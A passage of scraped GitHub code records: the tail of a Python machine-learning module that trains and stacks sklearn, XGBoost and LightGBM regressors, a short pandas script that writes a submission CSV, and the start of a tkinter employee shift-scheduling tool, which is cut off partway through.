pandas as pd\n df = pd.DataFrame({'id': ID,\n 'y': gbt_pred})\n df.to_csv(os.path.join(self.data_path, 'prediction.csv'), index=False)\n self.dump_validated_y(Gboost.predict(self.validation_X.cpu().numpy()))\n \n elif self.model_name == \"ensemble\":\n from sklearn.model_selection import KFold, GridSearchCV\n \n row_idx = [i for i in range(self.full_X.shape[0])]\n random.shuffle(row_idx)\n train_X = self.full_X[0:math.floor(len(row_idx) * self.train_percent), ...].cpu().numpy()\n val_X = self.full_X[train_X.shape[0]:, ...].cpu().numpy()\n train_Y = self.full_Y[0:train_X.shape[0], ...].cpu().numpy()\n val_Y = self.full_Y[train_X.shape[0]:, ...].cpu().numpy()\n \n score_function = r2_score\n\n # =============Add different models here!!!!=============\n model_heads = []\n models = []\n from sklearn import tree # 0\n model_DecisionTreeRegressor = tree.DecisionTreeRegressor()\n model_heads.append(\"Decision Tree Regression\\t\\t\")\n models.append(model_DecisionTreeRegressor)\n \n from sklearn import linear_model # 1\n model_LinearRegression = linear_model.LinearRegression()\n model_heads.append(\"Linear Regression\\t\\t\\t\\t\")\n models.append(model_LinearRegression)\n \n from sklearn import svm # 2\n model_SVR = svm.SVR()\n model_heads.append(\"Support Vector Machine Regression\")\n models.append(model_SVR)\n \n from sklearn import neighbors # 3\n model_KNeighborsRegressor = neighbors.KNeighborsRegressor()\n model_heads.append(\"K-Nearest Neighbor Regression\\t\")\n models.append(model_KNeighborsRegressor)\n \n from sklearn import ensemble # 4\n model_RandomForestRegressor = ensemble.RandomForestRegressor(n_estimators=20)\n model_heads.append(\"Random Forest Regression\\t\\t\")\n models.append(model_RandomForestRegressor)\n \n from sklearn import ensemble # 5\n model_AdaBoostRegressor = ensemble.AdaBoostRegressor(n_estimators=150)\n model_heads.append(\"AdaBoost Regression\\t\\t\\t\\t\")\n models.append(model_AdaBoostRegressor)\n \n from sklearn import ensemble # 6\n model_GradientBoostingRegressor = ensemble.GradientBoostingRegressor()\n model_heads.append(\"Gradient Boosting Regression\\t\")\n models.append(model_GradientBoostingRegressor)\n \n from sklearn.ensemble import BaggingRegressor # 7\n model_BaggingRegressor = BaggingRegressor()\n model_heads.append(\"Bagging Regression\\t\\t\\t\\t\")\n models.append(model_BaggingRegressor)\n \n from sklearn.tree import ExtraTreeRegressor # 8\n model_ExtraTreeRegressor = ExtraTreeRegressor()\n model_heads.append(\"ExtraTree Regression\\t\\t\\t\")\n models.append(model_ExtraTreeRegressor)\n \n import xgboost as xgb # 9\n # params = {'learning_rate': 0.1, 'n_estimators': 400, 'max_depth': 8, 'min_child_weight': 2, 'seed': 0,\n # 'subsample': 0.8, 'colsample_bytree': 0.8, 'gamma': 0.2, 'reg_alpha': 3, 'reg_lambda': 2}\n model_XGBoostRegressor = xgb.XGBRegressor()\n model_heads.append(\"XGBoost Regression\\t\\t\\t\\t\")\n models.append(model_XGBoostRegressor)\n # =============Model Adding Ends=============\n \n # =============For Esemble and Stacking =============\n from sklearn.linear_model import ElasticNet, Lasso, BayesianRidge, LassoLarsIC\n from sklearn.kernel_ridge import KernelRidge\n from sklearn.pipeline import make_pipeline\n from sklearn.preprocessing import RobustScaler\n from sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin, clone\n from sklearn.model_selection import KFold\n import xgboost as xgb\n import lightgbm as lgb\n from sklearn import linear_model\n from sklearn.tree import DecisionTreeRegressor \n from 
sklearn.ensemble import ExtraTreesRegressor\n\n\n \n # original combination: Enet+KRR+GBoost+lasso(meta)+xgb+lgb\n # new combination: adaboost+RandomForest+GBoost+lasso(meta)+xgb+lgb\n '''\n #lasso\n print('Bayes_Optimization(lasso)')\n alp = self.bayes_optimization.Bayes_opt_lasso(train_X = train_X, train_Y = train_Y)\n lasso = make_pipeline(RobustScaler(), Lasso(alpha = alp, random_state=1))\n #lasso = make_pipeline(RobustScaler(), Lasso(alpha =0.0005, random_state=1))\n '''\n #extra_tree\n print('Bayes_Optimization(extra_tree)')\n n_es, max_dep, max_fea, min_s_l, min_s_s=self.bayes_optimization.Bayes_opt_extratree(train_X = train_X, train_Y = train_Y) \n extra_tree = ExtraTreesRegressor(n_estimators=int(n_es),max_depth=int(max_dep), max_features=int(max_fea),\n min_samples_leaf=int(min_s_l), min_samples_split=int(min_s_s), n_jobs=-1,bootstrap=True)\n #adaboost\n print('Bayes_Optimization(adaboost)')\n n_es, l_ra, max_dep, max_fea, min_s_l, min_s_s=self.bayes_optimization.Bayes_opt_Adaboost(train_X = train_X, train_Y = train_Y) \n Adaboost = ensemble.AdaBoostRegressor(\n DecisionTreeRegressor( max_features = max_fea, max_depth = max_dep, \n min_samples_split = min_s_s,min_samples_leaf = min_s_l, random_state = 2),\n n_estimators = n_es,learning_rate = l_ra)\n #RandomForest\n print('Bayes_Optimization(RandomForest)')\n n_es, max_dep, max_fea, min_s_l, min_s_s=self.bayes_optimization.Bayes_opt_RandomForest(train_X = train_X, train_Y = train_Y) \n RandomForest = ensemble.RandomForestRegressor(n_estimators = n_es,\n max_features = max_fea, max_depth = max_dep, \n min_samples_split = min_s_s, min_samples_leaf = min_s_l, \n random_state = 2)\n #Gboost\n print('Bayes_Optimization(Gboost)')\n n_es, l_ra, max_dep, max_fea, min_s_l, min_s_s = self.bayes_optimization.Bayes_opt_GBoost(train_X = train_X, train_Y = train_Y) \n Gboost = ensemble.GradientBoostingRegressor(max_features = max_fea, max_depth = max_dep, \n min_samples_split = min_s_s, min_samples_leaf = min_s_l, random_state = 2,\n n_estimators = n_es, learning_rate = l_ra, loss='huber')\n #xgb\n model_xgb = xgb.XGBRegressor(colsample_bytree=0.4603, gamma=0.0468,\n learning_rate=0.05, max_depth=3,\n min_child_weight=1.7817, n_estimators=2200,\n reg_alpha=0.4640, reg_lambda=0.8571,\n subsample=0.5213, silent=1,\n random_state =7, nthread = -1)\n #lgb\n model_lgb = lgb.LGBMRegressor(objective='regression',num_leaves=5,\n learning_rate=0.05, n_estimators=720,\n max_bin = 55, bagging_fraction = 0.8,\n bagging_freq = 5, feature_fraction = 0.2319,\n feature_fraction_seed=9, bagging_seed=9,\n min_data_in_leaf =6, min_sum_hessian_in_leaf = 11)\n \n \n def get_model_score(model, x_all, y_all, n_folds=5):\n # cross-validated r2_score\n score_func = r2_score\n kf = KFold(n_splits=n_folds, shuffle=True)\n score_mean_test = 0\n score_mean_train = 0\n for train_idx, test_idx in kf.split(x_all):\n x_train = x_all[train_idx]\n y_train = y_all[train_idx]\n x_test = x_all[test_idx]\n y_test = y_all[test_idx]\n score_test, score_train = try_different_method(model, x_train, y_train, x_test, y_test, score_func)\n score_mean_test += score_test\n score_mean_train += score_train\n score_mean_test /= n_folds\n score_mean_train /= n_folds\n return score_mean_test\n \n \n def try_different_method(model, x_train, y_train, x_test, y_test, score_func):\n # compute the model score\n \"\"\"\n Inner function in train_evaluate_return_best_model for model training.\n :param model: one specific model\n :param x_train:\n :param y_train:\n :param x_test:\n :param y_test:\n :param score_func:\n :return score:\n \"\"\"\n model.fit(x_train, 
y_train)\n result_test = model.predict(x_test)\n result_train = model.predict(x_train)\n return score_func(y_test, result_test), score_func(y_train, result_train)\n \n \n class StackingAveragedModels(BaseEstimator, RegressorMixin, TransformerMixin):\n # define the StackingAveragedModels class\n \"\"\"\n from https://www.kaggle.com/serigne/stacked-regressions-top-4-on-leaderboard\n \"\"\"\n def __init__(self, base_models, meta_model, n_folds=5):\n self.base_models = base_models\n self.meta_model = meta_model\n self.n_folds = n_folds\n \n # We again fit the data on clones of the original models\n def fit(self, X, y):\n self.base_models_ = [list() for x in self.base_models]\n self.meta_model_ = clone(self.meta_model)\n kfold = KFold(n_splits=self.n_folds, shuffle=True, random_state=156)\n \n # Train cloned base models then create out-of-fold predictions\n # that are needed to train the cloned meta-model\n out_of_fold_predictions = np.zeros((X.shape[0], len(self.base_models)))\n for i, model in enumerate(self.base_models):\n for train_index, holdout_index in kfold.split(X, y):\n instance = clone(model)\n self.base_models_[i].append(instance)\n instance.fit(X[train_index], y[train_index])\n y_pred = instance.predict(X[holdout_index])\n out_of_fold_predictions[holdout_index, i] = y_pred.ravel()\n \n # Now train the cloned meta-model using the out-of-fold predictions as new feature\n self.meta_model_.fit(out_of_fold_predictions, y)\n return self\n \n # Do the predictions of all base models on the test data and use the averaged predictions as\n # meta-features for the final prediction which is done by the meta-model\n def predict(self, X):\n meta_features = np.column_stack([\n np.column_stack([model.predict(X) for model in base_models]).mean(axis=1)\n for base_models in self.base_models_])\n return self.meta_model_.predict(meta_features)\n \n # =============For Ensemble and Stacking(end)=============\n \n \n \n def train_evaluate_return_best_model(x_all, y_all, score_func=r2_score, fold_num=5, return_ave=False):\n \"\"\"\n Train predefined models on data using 5-fold validation\n :param x_all: ndarray containing all features\n :param y_all: ndarray containing all labels\n :param score_func: score function\n :param fold_num: fold number to use K-fold CV\n :param return_ave: return average performance on all methods?\n :return best_model: best model trained on all data\n \"\"\"\n print()\n print(\"Training model with K-folds...\")\n kf = KFold(n_splits=fold_num, shuffle=True)\n best_score = 0\n best_idx = 0\n ave_score = 0\n for (model_idx, model) in enumerate(models):\n score_mean_test = 0\n score_mean_train = 0\n for train_idx, test_idx in kf.split(x_all):\n x_train = x_all[train_idx]\n y_train = y_all[train_idx]\n x_test = x_all[test_idx]\n y_test = y_all[test_idx]\n score_test, score_train = try_different_method(model, x_train, y_train, x_test, y_test, score_func)\n score_mean_test+=score_test\n score_mean_train+=score_train\n score_mean_test /= fold_num\n score_mean_train /= fold_num\n ave_score += score_mean_test\n if not return_ave:\n print(\"{} \\t score train: {}, score test: {}\".format(model_heads[model_idx], score_mean_train, score_mean_test))\n if best_score < score_mean_test:\n best_score = score_mean_test\n best_idx = model_idx\n print(\"Training done\")\n print(\"Best model: {}\\t Score: {}\".format(model_heads[best_idx], best_score))\n if return_ave:\n print(\"Average score on {} models = {}\".format(len(models), ave_score/len(models)))\n best_model = models[best_idx]\n best_model.fit(x_all, 
y_all)\n return best_idx, best_model\n \n def tune_model_params(x_all, y_all):\n \"\"\"\n Tune models on data using 5-fold validation\n :param x_all: ndarray containing all features\n :param y_all: ndarray containing all labels\n \"\"\"\n print()\n print(\"Tuning model...\")\n cv_params = {'reg_alpha': [0.05, 0.1, 1, 2, 3], 'reg_lambda': [0.05, 0.1, 1, 2, 3]}\n other_params = {'learning_rate': 0.1, 'n_estimators': 400, 'max_depth': 8, 'min_child_weight': 2, 'seed': 0,\n 'subsample': 0.8, 'colsample_bytree': 0.8, 'gamma': 0.2, 'reg_alpha': 3, 'reg_lambda': 2}\n model = xgb.XGBRegressor(**other_params)\n optimized_GBM = GridSearchCV(estimator=model, param_grid=cv_params, scoring='r2', cv=5, verbose=1, n_jobs=1)\n optimized_GBM.fit(x_all, y_all)\n evaluate_result = optimized_GBM.cv_results_\n print('Result:{0}'.format(evaluate_result))\n print('Best params:{0}'.format(optimized_GBM.best_params_))\n print('Best score:{0}'.format(optimized_GBM.best_score_))\n \n def get_model(x_all, y_all, model_idx):\n \"\"\"\n Given model index return the corresponding model trained on all data\n :param x_all:\n :param y_all:\n :param model_idx:\n :return model:\n \"\"\"\n print()\n print(\"Training with all data using {}\".format(model_heads[model_idx]))\n model = models[model_idx].fit(x_all, y_all)\n return model\n \n \n '''\n print('Find best models:')\n find_best_model = False # display several preselected models' results (5-folds)\n if find_best_model:\n # show some results\n _, _ = train_evaluate_return_best_model(x_all=train_X, y_all=train_Y,\n score_func=score_function, fold_num=5)\n '''\n # =================================================\n # Ensemble + stacking\n # =================================================\n print()\n print(\"Ensemble start...\")\n '''\n score = get_model_score(lasso, train_X, train_Y)\n print(\"\\nLasso score: {:.4f}\\n\".format(score))\n '''\n score = get_model_score(extra_tree, train_X, train_Y)\n print(\"\\nextra_tree score: {:.4f}\\n\".format(score))\n score = get_model_score(Adaboost, train_X, train_Y)\n print(\"Adaboost score: {:.4f}\\n\".format(score))\n score = get_model_score(RandomForest, train_X, train_Y)\n print(\"Randomforest score: {:.4f}\\n\".format(score))\n score = get_model_score(Gboost, train_X, train_Y)\n print(\"Gradient Boosting score: {:.4f}\\n\".format(score))\n score = get_model_score(model_xgb, train_X, train_Y)\n print(\"Xgboost score: {:.4f}\\n\".format(score))\n score = get_model_score(model_lgb, train_X, train_Y)\n print(\"LGBM score: {:.4f}\\n\".format(score))\n \n \n #stacked_averaged_models = StackingAveragedModels(base_models=(ENet, GBoost, KRR),\n #meta_model=lasso)\n stacked_averaged_models = StackingAveragedModels(base_models=(Adaboost, RandomForest, Gboost),\n meta_model=extra_tree) \n score = get_model_score(stacked_averaged_models, train_X, train_Y)\n print(\"Stacking Averaged models score: {:.4f}\".format(score))\n stacked_averaged_models.fit(train_X, train_Y)\n stacked_train_pred = stacked_averaged_models.predict(train_X)\n stacked_pred = stacked_averaged_models.predict(val_X)\n print('r2 score of stack models on train data:', r2_score(train_Y, stacked_train_pred))\n model_xgb.fit(train_X, train_Y)\n xgb_train_pred = model_xgb.predict(train_X)\n xgb_pred = model_xgb.predict(val_X)\n print('r2 score of xgb on train data:', r2_score(train_Y, xgb_train_pred))\n model_lgb.fit(train_X, train_Y)\n 
lgb_train_pred = model_lgb.predict(train_X)\n lgb_pred = model_lgb.predict(val_X)\n print('r2 score of lgb on train data:', r2_score(train_Y, lgb_train_pred))\n print('r2 score on train data:')\n print(r2_score(train_Y, stacked_train_pred * 0.70 +\n xgb_train_pred * 0.15 + lgb_train_pred * 0.15))\n model_ensemble = stacked_pred * 0.70 + xgb_pred * 0.15 + lgb_pred * 0.15\n \n self.log_factory.InfoLog(\"The score of ensemble for validation={}\".format(r2_score(val_Y, model_ensemble)))\n # export a csv file in the required format\n ID = np.array(range(len(val_X)))\n import pandas as pd\n df = pd.DataFrame({'id': ID,\n 'y': model_ensemble})\n df.to_csv(os.path.join(self.data_path, 'prediction.csv'), index=False)\n self.dump_validated_y(\n stacked_averaged_models.predict(self.validation_X.cpu().numpy()) * 0.70 \n + model_xgb.predict(self.validation_X.cpu().numpy()) * 0.15 \n + model_lgb.predict(self.validation_X.cpu().numpy()) * 0.15)\n #============== end of the ensemble model ======================\n \n \n elif self.model_name == \"nnet\":\n self.train_model.initialization()\n computed_losses = []\n train_losses = []\n for epoch in range(self.train_model.total_epoch):\n stride = self.full_X.shape[0] // self.k_fold\n train_X, train_Y, test_X, test_Y = None, None, None, None\n\n test_loss = 0.0\n train_loss = 0.0\n test_mse = 0.0\n train_mse = 0.0\n test_r2_score = 0.0\n self.train_model.train()\n idx = [i for i in range(self.full_X.shape[0])]\n sampled_idx = random.sample(idx, self.full_Y.shape[0])\n for i in range(self.k_fold):\n indicator = np.array([False for i in range(self.full_X.shape[0])])\n if i != self.k_fold - 1:\n indicator[sampled_idx[i * stride: (i + 1) * stride]] = True\n else:\n indicator[sampled_idx[i * stride:]] = True\n # k-fold CV\n train_X = self.full_X[indicator == False, :]\n train_Y = self.full_Y[indicator == False, :]\n test_X = self.full_X[indicator == True, :]\n test_Y = self.full_Y[indicator == True, :]\n\n self.train_model.optimizer.zero_grad()\n predicted_y = self.train_model(train_X)\n temp_loss = self.train_model.compute_loss(predicted_y, train_Y)\n temp_loss.backward()\n self.train_model.optimizer.step()\n\n with torch.no_grad():\n train_loss += temp_loss.item() / self.k_fold\n predicted_y_test = self.train_model(test_X)\n test_loss += self.train_model.compute_loss(predicted_y_test, test_Y) / self.k_fold\n train_mse += F.mse_loss(predicted_y, train_Y) / self.k_fold\n test_mse += F.mse_loss(predicted_y_test, test_Y) / self.k_fold\n test_r2_score += r2_score(test_Y.cpu().numpy(), predicted_y_test.cpu().numpy()) / self.k_fold\n\n if epoch % 200 == 0:\n self.log_factory.InfoLog(\n \"Epoch={}, while test loss={}, train loss={}, test MSE={}, train MSE={}, r2_score={}\".format(\n epoch, test_loss, train_loss, test_mse, train_mse, test_r2_score))\n computed_losses.append(test_loss.detach().clone().cpu())\n train_losses.append(train_loss)\n with torch.no_grad():\n predicted_y_validate = self.train_model(self.validation_X).squeeze(1).cpu().numpy()\n self.dump_validated_y(predicted_y_validate)\n model_evaluation(computed_losses, train_losses, epoch_step=200)\n\n def kill(self):\n self.log_factory.kill()\n\n def dump_validated_y(self, predicted_y_validate):\n np_full_Y = self.full_Y\n try:\n np_full_Y = self.full_Y.squeeze(1).cpu().numpy()\n predicted_y_validate = predicted_y_validate.cpu().numpy()\n except Exception:\n pass\n\n if self.y_normalizer.initialized:\n predicted_y_validate = self.y_normalizer.decode(predicted_y_validate)\n np_full_Y = self.y_normalizer.decode(np_full_Y)\n\n fig = plt.figure(1)\n plt.scatter([1 for 
i in range(self.full_Y.shape[0])], np_full_Y, edgecolors='r')\n plt.scatter([2 for i in range(len(predicted_y_validate))], predicted_y_validate, edgecolors='b')\n fig.savefig(os.path.join(self.data_path, \"distribution.png\"))\n\n with open(os.path.join(self.data_path, \"y_validate.csv\"), 'w') as f:\n f.write(\"id,y\\n\")\n for i, pred_y in enumerate(predicted_y_validate):\n f.write(\"{},{}\\n\".format(i, pred_y))\n f.close()\n \n\n \n\n","repo_name":"GeCao/AML","sub_path":"Task1/src/CoreManagement.py","file_name":"CoreManagement.py","file_ext":"py","file_size_in_byte":37113,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
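The StackingAveragedModels class in the record above trains clones of each base model on K-1 folds and feeds their out-of-fold predictions to a meta-model. A minimal, self-contained sketch of that idea (the synthetic data and model choices here are illustrative, not the repo's configuration):

```python
import numpy as np
from sklearn.base import clone
from sklearn.model_selection import KFold
from sklearn.linear_model import Ridge
from sklearn.tree import DecisionTreeRegressor

rng = np.random.default_rng(0)
X = rng.normal(size=(200, 5))
y = X @ rng.normal(size=5) + 0.1 * rng.normal(size=200)

base_models = [Ridge(alpha=1.0), DecisionTreeRegressor(max_depth=4)]
meta_model = Ridge()

# out-of-fold predictions become the meta-model's training features
kf = KFold(n_splits=5, shuffle=True, random_state=156)
oof = np.zeros((X.shape[0], len(base_models)))
fitted = [[] for _ in base_models]  # one list of fold-clones per base model
for i, model in enumerate(base_models):
    for train_idx, holdout_idx in kf.split(X):
        inst = clone(model).fit(X[train_idx], y[train_idx])
        fitted[i].append(inst)
        oof[holdout_idx, i] = inst.predict(X[holdout_idx])
meta_model.fit(oof, y)

# at predict time, average each base model's fold-clones, then stack
meta_features = np.column_stack([
    np.column_stack([m.predict(X) for m in clones]).mean(axis=1)
    for clones in fitted])
print(meta_model.predict(meta_features)[:3])
```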
+{"seq_id":"28262302358","text":"import argparse\nimport json\n\nimport pandas as pd\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"create sub\")\n\n parser.add_argument(\"exp\")\n args = parser.parse_args()\n\n with open(f\"data/output/{args.exp}.json\", \"r\") as f:\n result = json.load(f)\n\n pred = result[\"output\"][\"pred\"]\n\n sub = pd.read_csv(\"data/submit_sample.csv\", names=[\"id\", \"pred\"])\n sub[\"pred\"] = pred\n\n sub.to_csv(f\"data/subs/{args.exp}.csv\", header=False, index=False)\n","repo_name":"habroptilus/ds-monorepo","sub_path":"projects/sony/create_sub.py","file_name":"create_sub.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"72671563564","text":"from tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nfrom tkinter.ttk import *\r\nimport EmployeeData\r\nimport Classes\r\nfrom Edit_Emp import values\r\nimport copy\r\n\r\n\r\n\r\ndef generate(gen_win):\r\n def generate_scheudle(new_emp_list, shifts, weekly_rest):\r\n def checks():\r\n #checking if the employee is not already in current shift, previous shift or next shift\r\n if shifts_sorted[x].shift_num%2 == 0:\r\n shifts_check = []\r\n i = -4\r\n while i < 6:\r\n if shifts_sorted[x].shift_num + i > 41:\r\n pass\r\n else:\r\n shifts_check.append(weekly_rest[shifts_sorted[x].shift_num + i])\r\n i += 1\r\n if new_emp_list[count].employee_number in shifts_check:\r\n return False\r\n else:\r\n shifts_check = []\r\n i = -5\r\n while i < 5:\r\n if shifts_sorted[x].shift_num + i > 41:\r\n pass\r\n else:\r\n shifts_check.append(weekly_rest[shifts_sorted[x].shift_num + i])\r\n i += 1\r\n if new_emp_list[count].employee_number in shifts_check:\r\n return False\r\n\r\n #Checking if the employee has not yet exceeded the limitation of 7 nights per 2 weeks\r\n if (shifts_sorted[x].shift_num%6 == 4 or shifts_sorted[x].shift_num%6 ==5) and new_emp_list[count].last_week_nights + 1 == 8:\r\n return False\r\n if new_emp_list[count].num_of_shifts == 0:\r\n return False\r\n return True\r\n\r\n def sort_by_weeklyshifts(elem):\r\n return elem.weekly_rest_num\r\n\r\n def sort_by_amount(elem):\r\n return elem.num_of_shifts\r\n\r\n\r\n new_emp_list = sorted(new_emp_list, key = sort_by_weeklyshifts)\r\n shifts_sorted = []\r\n for x in range(42):\r\n shifts_sorted.append(Classes.Shift(x,len(shifts[x]),copy.deepcopy(shifts[x])))\r\n shifts_sorted = sorted(shifts_sorted, key = sort_by_amount)\r\n\r\n for x in range(0,42,2):\r\n if weekly_rest[shifts_sorted[x].shift_num] == 0:\r\n found = False\r\n count = 0\r\n while found == False and count < len(new_emp_list):\r\n if new_emp_list[count].employee_number in shifts_sorted[x].list_of_employees:\r\n if checks():\r\n weekly_rest[shifts_sorted[x].shift_num]= new_emp_list[count].employee_number\r\n new_emp_list[count].num_of_shifts -= 1\r\n found = True\r\n if (shifts_sorted[x].shift_num%6 == 4 or shifts_sorted[x].shift_num%6 ==5):\r\n new_emp_list[count].last_week_nights += 1\r\n new_emp_list[count].weekly_rest_num -= 1\r\n while count15 and x<20):\r\n continue\r\n if employee_number not in shifts[x*2+1]:\r\n shifts[x*2+1].append(employee_number)\r\n weekly_counter += 1\r\n if (emp_list[employee_number-1].incharge == True):\r\n shifts[x*2].append(employee_number)\r\n weekly_counter += 1\r\n else:\r\n if employee_number in shifts[x*2+1]:\r\n shifts[x*2+1].remove(employee_number)\r\n if (emp_list[employee_number-1].incharge == True):\r\n shifts[x*2].remove(employee_number)\r\n emp_list[employee_number-1].weekly_rest_num = weekly_counter\r\n combo.configure(state = 'normal')\r\n select_btn.config(state='normal')\r\n emp_rest.destroy()\r\n\r\n\r\n\r\n emp_rest = Toplevel()\r\n emp_rest.geometry('600x300')\r\n emp_rest.title(\"Personal Employee Restrictions\")\r\n employee_number = int(combo.get().split(':')[0])\r\n headline_personal = Label(emp_rest, font = 'Ariel 14 bold underline', justify='center', text=combo.get()[2:])\r\n headline_personal.grid(row=0, pady=5)\r\n\r\n # frame for the days of the week on top\r\n frame_body = Frame(emp_rest, relief='groove')\r\n frame_body.grid(row=1, pady=10, padx=10)\r\n frame_body_head = Frame(frame_body, relief = 'groove')\r\n frame_body_head.grid(row = 0, column = 
1)\r\n lbl_sun = Label(frame_body_head, text=\"Sunday\").grid(row=0, column=1, padx=10, pady=10)\r\n lbl_mon = Label(frame_body_head, text=\"Monday\").grid(row=0, column=2, padx=10, pady=10)\r\n lbl_teu = Label(frame_body_head, text=\"Tuesday\").grid(row=0, column=3, padx=10, pady=10)\r\n lbl_wed = Label(frame_body_head, text=\"Wednesday\").grid(row=0, column=4, padx=10, pady=10)\r\n lbl_thu = Label(frame_body_head, text=\"Thursday\").grid(row=0, column=5, padx=10, pady=10)\r\n lbl_fri = Label(frame_body_head, text=\"Friday\").grid(row=0, column=6, padx=10, pady=10)\r\n lbl_sat = Label(frame_body_head, text=\"Saturday\").grid(row=0, column=7, padx=10, pady=10)\r\n\r\n # frame for the comboboxes\r\n frame_body_left = Frame(frame_body, relief='groove')\r\n frame_body_left.grid(row=1, column=0, sticky='w')\r\n lbl_mor = Label(frame_body_left, text=\"Morning:\").grid(row=0, column=0, padx=10, pady=10)\r\n lbl_after = Label(frame_body_left, text=\"Afternoon:\").grid(row=2, column=0, padx=10, pady=10)\r\n lbl_eve = Label(frame_body_left, text=\"Night:\").grid(row=4, column=0, padx=10, pady=10)\r\n\r\n frame_body_right = Frame(frame_body)\r\n frame_body_right.grid(row=1, column=1)\r\n\r\n combo_shifts = []\r\n row2 = 0\r\n column2 = 0\r\n for x in range(21):\r\n shift_box = Combobox(frame_body_right, values='\" \" Yes', width = 5)\r\n shift_box.current(0)\r\n combo_shifts.append(shift_box)\r\n combo_shifts[x].grid(row= row2, column=column2, padx=7, pady=8)\r\n if int(combo.get().split(':')[0]) in shifts[x*2+1] or int(combo.get().split(':')[0]) in shifts[x*2]:\r\n combo_shifts[x].current(1)\r\n row2 += 1\r\n if row2%3 == 0:\r\n row2 = 0\r\n column2 +=1\r\n\r\n save_btn = Button(emp_rest, text = 'save', command = save_shifts)\r\n save_btn.grid(row = 2, pady = 8)\r\n emp_rest.protocol(\"WM_DELETE_WINDOW\", close_win)\r\n\r\n\r\n # Checking the restrictions of maximum 3 consecutive Saturdays and up to 7 nights per week\r\n # For the hand picked restrictions\r\n def check_restrictions():\r\n new_emp_list = copy.deepcopy(emp_list)\r\n weekly_rest = []\r\n for x in range(42):\r\n weekly_rest.append(int(restrictions[x].get().split(':')[0]))\r\n if (x%6 == 4 or x%6 == 5) and int(restrictions[x].get().split(':')[0]) != 0:\r\n if new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].last_week_nights + 1 == 8:\r\n messagebox.showerror('Restrictions Error',\r\n new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].name + \" cannot work more than\"\r\n \" 7 nights per 2 weeks\")\r\n return\r\n else:\r\n new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].last_week_nights += 1\r\n elif (x>31 and x<40) and (int(restrictions[x].get().split(':')[0]) != 0):\r\n if new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].saturdays + 1 == 4:\r\n messagebox.showerror('Restrictions Error', new_emp_list[int(\r\n restrictions[x].get().split(':')[0]) - 1].name + \" cannot work more than 3 consecutive Saturdays\")\r\n return\r\n if int(restrictions[x].get().split(':')[0]) > 0:\r\n if new_emp_list[int(restrictions[x].get().split(':')[0])-1].num_of_shifts > 0:\r\n new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].num_of_shifts -= 1\r\n else:\r\n pass\r\n for x in range(4):\r\n if int(last_week[x].get().split(':')[0]) == 0:\r\n messagebox.showerror('Restrictions Error', \" Last Saturday shifts fields must be filled\")\r\n return\r\n weekly_rest.append(int(last_week[x].get().split(':')[0]))\r\n generate_scheudle(new_emp_list, shifts, weekly_rest)\r\n\r\n\r\n\r\n\r\n #main part of generating the 
schedule\r\n emp_list = EmployeeData.importList()\r\n\r\n\r\n\r\n headline = Label(gen_win, text=\"Generate New Schedule\", font=\"Ariel 14 bold underline\", justify = 'center')\r\n headline.grid(row=0, pady=10)\r\n select_emp = Label(gen_win, text = \"Restrictions\", font = \"Ariel 12 bold underline\")\r\n select_emp.grid(row = 1, column = 0, padx = 10, pady = 10)\r\n\r\n\r\n #main frame for hand picking shifts\r\n frame_body = Frame(gen_win, relief = 'groove', width = 500, height = 500)\r\n frame_body.grid(row =2, padx = 10, pady = 10)\r\n\r\n #frame for the days of the week on top\r\n frame_body_head = Frame(frame_body, relief = 'groove')\r\n frame_body_head.grid(row =0, column = 1)\r\n lbl_sun = Label(frame_body_head, text=\"Sunday\").grid(row=0, column=1, padx=10, pady=10)\r\n lbl_mon = Label(frame_body_head, text=\"Monday\").grid(row=0, column=2, padx=10, pady=10)\r\n lbl_teu = Label(frame_body_head, text=\"Tuesday\").grid(row=0, column=3, padx=10, pady=10)\r\n lbl_wed = Label(frame_body_head, text=\"Wednesday\").grid(row=0, column=4, padx=10, pady=10)\r\n lbl_thu = Label(frame_body_head, text=\"Thursday\").grid(row=0, column=5, padx=10, pady=10)\r\n lbl_fri = Label(frame_body_head, text=\"Friday\").grid(row=0, column=6, padx=10, pady=10)\r\n lbl_sat = Label(frame_body_head, text=\"Saturday\").grid(row=0, column=7, padx=10, pady=10)\r\n\r\n #frame for days and positions\r\n frame_body_left = Frame(frame_body, relief = 'groove')\r\n frame_body_left.grid(row = 2, column = 0, sticky = 'w')\r\n lbl_mor = Label(frame_body_left, text=\"Morning:\").grid(row=0, column=0, padx=10, pady=10)\r\n lbl_after = Label(frame_body_left, text=\"Afternoon:\").grid(row=2, column=0, padx=10, pady=10)\r\n lbl_eve = Label(frame_body_left, text=\"Night:\").grid(row=4, column=0, padx=10, pady=10)\r\n for x in range(0,5,2):\r\n lbl_incharge = Label(frame_body_left, text = \"Incharge\")\r\n lbl_patrol = Label(frame_body_left, text = \"Patrol\")\r\n lbl_incharge.grid(row = x, column = 1, padx = 2, pady = 2)\r\n lbl_patrol.grid(row = x+1, column = 1, padx =2, pady =2)\r\n\r\n\r\n #Creates and places a weekly restrictions table for the supervisor to hand pick\r\n frame_body_main = Frame(frame_body, relief = 'groove')\r\n frame_body_main.grid(row = 2, column = 1)\r\n restrictions = []\r\n row1 = 0\r\n column1 = 0\r\n for x in range(0, 42,2):\r\n combo_shift = Combobox(frame_body_main, state='readonly', width=7)\r\n combo_shift.configure(value=values(emp_list))\r\n restrictions.append(combo_shift)\r\n restrictions[x].grid(row= row1, column=column1, padx=2, pady=5)\r\n combo_shift2 = Combobox(frame_body_main, state='readonly', width=7)\r\n combo_shift2.configure(value=values(emp_list))\r\n restrictions.append(combo_shift2)\r\n restrictions[x+1].grid(row=row1+1, column=column1, padx=2, pady=5)\r\n restrictions[x].current(0)\r\n restrictions[x+1].current(0)\r\n row1 += 2\r\n if row1%6 == 0:\r\n row1 = 0\r\n column1 +=1\r\n\r\n frame_body_right = Frame(frame_body)\r\n frame_body_right.grid(row = 2, column = 2, padx = 5)\r\n headline2 = Label(frame_body_right, font='Ariel 12 bold underline', text=\"Saturday shifts:\")\r\n headline2.grid(row=0, pady = 